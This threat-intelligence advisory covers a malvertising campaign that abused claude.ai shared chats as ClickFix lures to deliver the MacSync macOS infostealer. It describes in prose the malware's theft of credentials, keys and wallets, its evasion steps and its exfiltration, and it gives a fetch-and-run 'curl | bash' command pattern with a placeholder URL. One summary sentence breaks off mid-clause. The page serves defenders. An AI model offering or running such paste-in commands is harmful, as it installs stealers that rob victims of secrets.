Anthropic claude.ai Shared-Chat Feature Abused in ClickFix Malvertising Campaign Delivering MacSync macOS Infostealer — Threadlinqs Intelligence
As of 2026-06-18, Anthropic claude.ai Shared-Chat Feature Abused in ClickFix Malvertising Campaign Delivering MacSync macOS Infostealer is a high-severity malware threat, tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 23 indicators of compromise.
Threat ID: TL-2026-0856 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
A seven-week malvertising operation tracked by Trend Micro (TrendAI Research) hijacked Google Ads for popular AI developer tools to funnel 2,000+ victims to ClickFix lure pages, then escalated to
Trend Micro's TrendAI Research team documented a malvertising and social-engineering campaign that weaponized Anthropic's claude.ai shared-conversation (shared-chat) feature as a malware-delivery surface for the MacSync macOS infostealer. The operators began by purchasing Google Ads impersonating popular AI developer and macOS maintenance tools (Homebrew, Claude Code, ChatGPT Codex/Atlas, Perplexity, Cursor IDE, JetBrains, and generic 'Mac storage / clean / fix' utilities), funneling more than 2,000 victims to ClickFix-style fake install pages. Early waves hosted lures on disposable infrastructure including GitLab Pages (90+ malicious *.gitlab.io subdomains), Cloudflare Pages, Squarespace, and Tencent EdgeOne. The campaign then made a notable tactical leap by relocating the ClickFix instructions into claude.ai shared chats: because victims landed on a fully legitimate, trusted, TLS-valid Anthropic domain, browser warnings, manual URL inspection, and Google Safe Browsing heuristics were far easier to evade.
The ClickFix social-engineering pattern instructs the victim to copy and paste a one-line terminal command (typically a curl/bash pipe such as 'curl -fsSL <url> | /bin/bash') that often contained a base64-encoded script. Once decoded and executed, the loader fetched a second-stage payload. The decoder first checks whether a Russian keyboard layout or input method is enabled on the macOS host and aborts if so — a classic CIS-region avoidance / sandbox-discrimination measure. The second stage is the MacSync infostealer, which retrieves remote AppleScript commands from an API-key-gated C2 server and executes them in memory via osascript (no on-disk payload), defeating static analysis and many behavioral detections.
MacSync displays a deceptive macOS-style password prompt to harvest the user's login credential and then steals an extensive set of secrets: macOS Keychain databases, SSH private keys, AWS credentials, Kubernetes configs and other cloud keys, Chromium- and Firefox-based browser profiles (cookies, autofill, history, saved logins, extension storage), Safari cookies/autofill/notes, Telegram Desktop data, and cryptocurrency wallet data from both browser-based and desktop wallets — including seed-phrase exfiltration logic and binary patching of Ledger Live to inject attacker-supplied components. Collected data is staged as a ZIP archive in /tmp (e.g. /tmp/osalogging.zip), split into ~10 MB chunks, and exfiltrated to a hardcoded second-stage host over HTTPS via repeated authenticated PUT requests using a unique upload session ID, while a fake system-error message masks the activity and the loader relaunches as a background daemon with I/O redirected to /dev/null. Trend Micro observed at least 45 unique shared-conversation IDs, the most heavily trafficked (498818d9-1ddc-4fbb-9fa7-56dfb84840b0) receiving 55 confirmed traffic counts. After notification by TrendAI Research, Anthropic investigated, banned the responsible accounts, disabled the malicious shared conversations, and began implementing additional abuse mitigations for the shared-chat feature. No CVE or CVSS applies: this is platform/feature abuse and social engineering, not exploitation of a software vulnerability.
Target sectors: technology, software development, cryptocurrency, consumers
Target regions: Asia-Pacific, Taiwan, Japan, Singapore, India, France, Italy
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 23 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
MALWARE, HIGH, threat intelligence, cybersecurity, T1583, T1608, T1650, T1189, T1204, T1204, T1059, T1059, T1543, T1140